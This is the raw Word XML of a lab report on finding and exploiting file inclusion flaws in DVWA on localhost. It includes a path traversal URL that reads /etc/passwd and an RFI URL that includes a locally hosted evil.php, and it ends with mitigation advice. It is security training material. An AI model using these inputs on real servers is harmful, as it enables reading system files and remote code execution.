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3B4984" wp14:paraId="19A6B08B" wp14:textId="0D60BECB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="299" w:beforeAutospacing="off" w:after="299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Report on Remote File Inclusion (RFI) Vulnerability in DVWA</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="563B4984" wp14:paraId="0A5C09D2" wp14:textId="49246ED4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="563B4984" wp14:paraId="074C7903" wp14:textId="2BCF1186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exercise is to identify and exploit a Remote File Inclusion (RFI) vulnerability in the DVWA (Damn Vulnerable Web Application). RFI is a web application vulnerability that allows an attacker to include a remote file, typically a malicious PHP file, to execute commands on a vulnerable server.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="563B4984" wp14:paraId="14F44677" wp14:textId="29C1C79C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In this report, I will cover the steps taken to identify the RFI vulnerability, exploit it, and the implications of this vulnerability. Furthermore, I will provide recommendations for securing web applications against such attacks.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="5AD50DBA" wp14:textId="0270D9E3"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="563B4984" wp14:paraId="4EF463CC" wp14:textId="7CC0D9ED">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281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Task Overview</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="563B4984" wp14:paraId="78A870D2" wp14:textId="6D216970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1: Identifying File Inclusion Point</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="563B4984" wp14:paraId="275ABA46" wp14:textId="007E99DF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first task was to identify a file inclusion point in the application. By manipulating the URL parameter to include sensitive system files, I confirmed that the application is vulnerable to </w:t>
      </w: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File Inclusion (LFI)</w:t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3B4984" wp14:paraId="3F3626C1" wp14:textId="55156012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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="563B4984" wp14:paraId="3D8EB7EB" wp14:textId="79EF01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Opened the URL: </w:t>
      </w:r>
      <w:hyperlink r:id="R0277224a4c1f4158">
        <w:r w:rsidRPr="563B4984" w:rsidR="1A69EE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http://localhost/vulnerabilities/fi/</w:t>
        </w:r>
      </w:hyperlink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3B4984" wp14:paraId="6F94B03F" wp14:textId="63BFA2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page showed a form that accepted a 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(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?page=include.php</w:t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563B4984" wp14:paraId="0B34B9A1" wp14:textId="7D396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modified the URL to: </w:t>
      </w:r>
      <w:hyperlink r:id="R665ca90591604249">
        <w:r w:rsidRPr="563B4984" w:rsidR="1A69EE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http://localhost/vulnerabilities/fi/?page=../../../../etc/passwd</w:t>
        </w:r>
      </w:hyperlink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63B4984" wp14:paraId="6C42725B" wp14:textId="6D939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exposed the contents of the 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/etc/passwd</w:t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file, indicating that the application is vulnerable to </w:t>
      </w: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LFI</w:t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05452C21">
      <w:r w:rsidR="1A69EEC6">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="71D75D1A" wp14:anchorId="203E524B">
            <wp:extent cx="3974856" cy="2407845"/>
            <wp:effectExtent l="76200" t="76200" r="121285" b="107315"/>
            <wp:docPr id="126105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8b5380720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74856" cy="240784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A69EEC6">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="16E3E10C" wp14:anchorId="70163E6B">
            <wp:extent cx="4600575" cy="2462487"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="627864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50c15906c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4984" w:rsidRDefault="563B4984" w14:paraId="1A54F139" w14:textId="47F89495"/>
    <w:p w:rsidR="1A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="667868F9" w14:textId="778A4D83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2: Exploiting Remote File Inclusion (RFI)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="436B5283" w14:textId="51CAA211">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="319" w:beforeAutospacing="off" w:after="319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</w:p>
    <w:p w:rsidR="1A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="5D2237EA" w14:textId="28814381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To demonstrate a Remote File Inclusion (RFI) vulnerability by injecting and executing a malicious PHP file hosted on a local server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="408FC46A" w14:textId="430B0CA6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="319" w:beforeAutospacing="off" w:after="319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 Performed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="3A3F8695" w14:textId="14B566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 a Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="5C986E28" w14:textId="619953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 name: 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evil.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="509F65AF" w14:textId="09F8E8F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Location: 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C:\xampp\htdocs\evil.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="7F985598" w14:textId="731E9CF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Content:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="26575843" w14:textId="7E802608">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidR="1A69EEC6">
        <w:drawing>
          <wp:inline wp14:editId="33C96766" wp14:anchorId="50DFF04A">
            <wp:extent cx="4457700" cy="1343025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="387442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b16171054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4984" w:rsidP="563B4984" w:rsidRDefault="563B4984" w14:paraId="1761767A" w14:textId="3EF81909">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="2889BFDF" w14:textId="1B3B3C1F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Started a Local PHP Server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="1634A8D3" w14:textId="384839D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Command used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="7BF8B4B3" w14:textId="6835CA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The file was hosted locally and accessible via:</w:t>
      </w:r>
      <w:r>
        <w:br/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a4ed7593bb8840a0">
        <w:r w:rsidRPr="563B4984" w:rsidR="1A69EE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http://localhost:8000/evil.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="1A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="4CAEDE96" w14:textId="4819A7E7">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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Executed RFI via DVWA:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="599D790F" w14:textId="4D7B1F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Accessed DVWA File Inclusion page:</w:t>
      </w:r>
      <w:r>
        <w:br/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dc5539f1d6bd4302">
        <w:r w:rsidRPr="563B4984" w:rsidR="1A69EEC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http://localhost/DVWA/vulnerabilities/fi/?page=http://localhost:8000/evil.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="563B4984" w:rsidP="563B4984" w:rsidRDefault="563B4984" w14:paraId="1639C9E6" w14:textId="241BB7CA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63B4984" w:rsidP="563B4984" w:rsidRDefault="563B4984" w14:paraId="6A281ED2" w14:textId="1768B2D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63B4984" w:rsidP="563B4984" w:rsidRDefault="563B4984" w14:paraId="5763164F" w14:textId="6C9C417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A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="3A1DE37A" w14:textId="119D6CC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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="24DBEBF9" w14:textId="653BC070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The browser displayed:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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3B4984" w:rsidR="1A69EEC6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"this is a malicious file"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="60676A7A" w14:textId="79E14D4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1A69EEC6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This confirms the remote PHP file was included and executed successfully on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="563B4984" w:rsidP="563B4984" w:rsidRDefault="563B4984" w14:paraId="260AE13C" w14:textId="341C2C0F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1A69EEC6" w:rsidP="563B4984" w:rsidRDefault="1A69EEC6" w14:paraId="729AD2AF" w14:textId="3728E749">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidR="1A69EEC6">
        <w:drawing>
          <wp:inline wp14:editId="59B7C163" wp14:anchorId="5A08DCFE">
            <wp:extent cx="5636484" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="66152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5e689ca91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79097" w:rsidP="563B4984" w:rsidRDefault="7DD79097" w14:paraId="6918E981" w14:textId="73BF579E">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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3: Observation and Findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7DD79097" w:rsidP="563B4984" w:rsidRDefault="7DD79097" w14:paraId="3120ECCF" w14:textId="6BFE89B0">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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exploiting the RFI vulnerability, I was able to execute system commands on the server. Specifically, the malicious file included on the server returned the output of the </w:t>
      </w:r>
      <w:r w:rsidRPr="563B4984" w:rsidR="7DD79097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command, which displayed the server's user ID.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7DD79097" w:rsidP="563B4984" w:rsidRDefault="7DD79097" w14:paraId="65CB6595" w14:textId="2B8AF07A">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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>The vulnerability works because the application allowed external files to be included and executed, opening up the possibility for attackers to run arbitrary commands on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="563B4984" w:rsidRDefault="563B4984" w14:paraId="42E8CECA" w14:textId="16AD9700"/>
    <w:p w:rsidR="7DD79097" w:rsidP="563B4984" w:rsidRDefault="7DD79097" w14:paraId="13AF618A" w14:textId="60115AF2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/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Implications of RFI Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7DD79097" w:rsidP="563B4984" w:rsidRDefault="7DD79097" w14:paraId="42A66462" w14:textId="0712D0D2">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/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 File Inclusion (RFI)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severe security risk because it allows attackers to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7DD79097" w:rsidP="563B4984" w:rsidRDefault="7DD79097" w14:paraId="52470386" w14:textId="128B575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Execute arbitrary code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server: By including a malicious file, attackers can execute system commands and gain control of the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7DD79097" w:rsidP="563B4984" w:rsidRDefault="7DD79097" w14:paraId="12D80EFD" w14:textId="52D538B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Compromise sensitive data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>: If an attacker can access files such as database credentials or system files, they can steal sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7DD79097" w:rsidP="563B4984" w:rsidRDefault="7DD79097" w14:paraId="482383DC" w14:textId="009E16D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server compromise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>: An attacker can escalate the attack, gaining full control of the server, leading to data loss, server downtime, and unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="563B4984" w:rsidRDefault="563B4984" w14:paraId="0DDDF41D" w14:textId="2F5FC444"/>
    <w:p w:rsidR="7DD79097" w:rsidP="563B4984" w:rsidRDefault="7DD79097" w14:paraId="2C3B9146" w14:textId="028406C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/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Recommendations for Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7DD79097" w:rsidP="563B4984" w:rsidRDefault="7DD79097" w14:paraId="0D1F702C" w14:textId="1878899D">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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>To prevent RFI and other file inclusion vulnerabilities, I recommend the following best practices:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7DD79097" w:rsidP="563B4984" w:rsidRDefault="7DD79097" w14:paraId="0377919E" w14:textId="313D81B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7DD790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Disable </w:t>
      </w:r>
      <w:r w:rsidRPr="563B4984" w:rsidR="7DD7909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allow_url_include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</w:t>
      </w:r>
      <w:r w:rsidRPr="563B4984" w:rsidR="7DD79097">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allow_url_include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disabled in the </w:t>
      </w:r>
      <w:r w:rsidRPr="563B4984" w:rsidR="7DD79097">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>php.ini</w:t>
      </w:r>
      <w:r w:rsidRPr="563B4984" w:rsidR="7DD790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configuration file. This will prevent PHP from including files from external URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2F9544B8" w:rsidP="563B4984" w:rsidRDefault="2F9544B8" w14:paraId="34380C0F" w14:textId="5D984E00">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidR="2F9544B8">
        <w:drawing>
          <wp:inline wp14:editId="0DFF669E" wp14:anchorId="549D8EB6">
            <wp:extent cx="2273417" cy="419122"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="21396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1f855d62e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544B8" w:rsidP="563B4984" w:rsidRDefault="2F9544B8" w14:paraId="3BF7C8E5" w14:textId="11BD9EF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Sanitize User Input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Never trust user input when including files. Always validate and sanitize the </w:t>
      </w:r>
      <w:r w:rsidRPr="563B4984" w:rsidR="2F9544B8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63B4984" w:rsidR="2F9544B8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file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to ensure only legitimate files are included.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2F9544B8" w:rsidP="563B4984" w:rsidRDefault="2F9544B8" w14:paraId="48DD117C" w14:textId="4B0376C6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Whitelists for File Inclusion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allowing arbitrary file inclusion, maintain a list of allowed files that can be included. This can be done by checking user input against the list of predefined safe files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2F9544B8" w:rsidP="563B4984" w:rsidRDefault="2F9544B8" w14:paraId="38C02AC3" w14:textId="2D9466D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Keep Software Updated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all software, including PHP and web servers, is kept up to date with the latest security patches to prevent known vulnerabilities from being exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2F9544B8" w:rsidP="563B4984" w:rsidRDefault="2F9544B8" w14:paraId="5661EBF1" w14:textId="24562FC8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 Proper Access Controls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Limit access to sensitive files on the server, such as configuration files and database credentials, by setting strict permissions on them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2F9544B8" w:rsidP="563B4984" w:rsidRDefault="2F9544B8" w14:paraId="490CBFD8" w14:textId="309AE06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Web Application Firewalls (WAFs)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Deploy a WAF to monitor and block malicious traffic attempting to exploit vulnerabilities like RFI.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="563B4984" w:rsidP="563B4984" w:rsidRDefault="563B4984" w14:paraId="022DF301" w14:textId="4CBF36FC">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2F9544B8" w:rsidP="563B4984" w:rsidRDefault="2F9544B8" w14:paraId="4B43B753" w14:textId="2B6915EB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="563B4984" w:rsidR="2F9544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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2F9544B8" w:rsidP="563B4984" w:rsidRDefault="2F9544B8" w14:paraId="0E55F4DF" w14:textId="4953CAFF">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
      </w:pP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63B4984" w:rsidR="2F9544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 File Inclusion (RFI)</w:t>
      </w:r>
      <w:r w:rsidRPr="563B4984" w:rsidR="2F9544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vulnerability in the DVWA application was successfully identified and exploited. The attack demonstrated how an attacker can inject malicious files and execute arbitrary code on the server, leading to a potential full server compromise. By following the best practices outlined above, such vulnerabilities can be mitigated and the security of web applications can be significantly improved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="563B4984" w:rsidP="563B4984" w:rsidRDefault="563B4984" w14:paraId="179636BB" w14:textId="0CC52E0A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off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ad74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582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e77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9be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585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14c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627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5c4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a60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B0A13"/>
    <w:rsid w:val="183B0A13"/>
    <w:rsid w:val="1A69EEC6"/>
    <w:rsid w:val="2A2CC361"/>
    <w:rsid w:val="2F9544B8"/>
    <w:rsid w:val="33CE97EF"/>
    <w:rsid w:val="4B87DE30"/>
    <w:rsid w:val="563B4984"/>
    <w:rsid w:val="5C604637"/>
    <w:rsid w:val="73C71E47"/>
    <w:rsid w:val="73CA9AF6"/>
    <w:rsid w:val="77595C03"/>
    <w:rsid w:val="77893050"/>
    <w:rsid w:val="7B73D80C"/>
    <w:rsid w:val="7DD79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0A13"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{40B30044-9731-458D-9728-480CCE256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3B498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63B498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vulnerabilities/fi/" TargetMode="External" Id="R0277224a4c1f4158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/vulnerabilities/fi/?page=../../../../etc/passwd" TargetMode="External" Id="R665ca90591604249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image.png" Id="R63a8b53807204b13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="Rc9f50c15906c4140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="R37fb161710544cd7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:8000/evil.php" TargetMode="External" Id="Ra4ed7593bb8840a0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost/DVWA/vulnerabilities/fi/?page=http://localhost:8000/evil.php" TargetMode="External" Id="Rdc5539f1d6bd4302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="R8fd5e689ca914097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="R8ef1f855d62e4faf" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R21c564e1334f43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2025-05-11T20:02:58.2871010Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-11T20:21:51.3219207Z</dcterms:modified>
  <dc:creator>Hafsa Ahad Butt</dc:creator>
  <lastModifiedBy>Hafsa Ahad Butt</lastModifiedBy>
</coreProperties>
</file>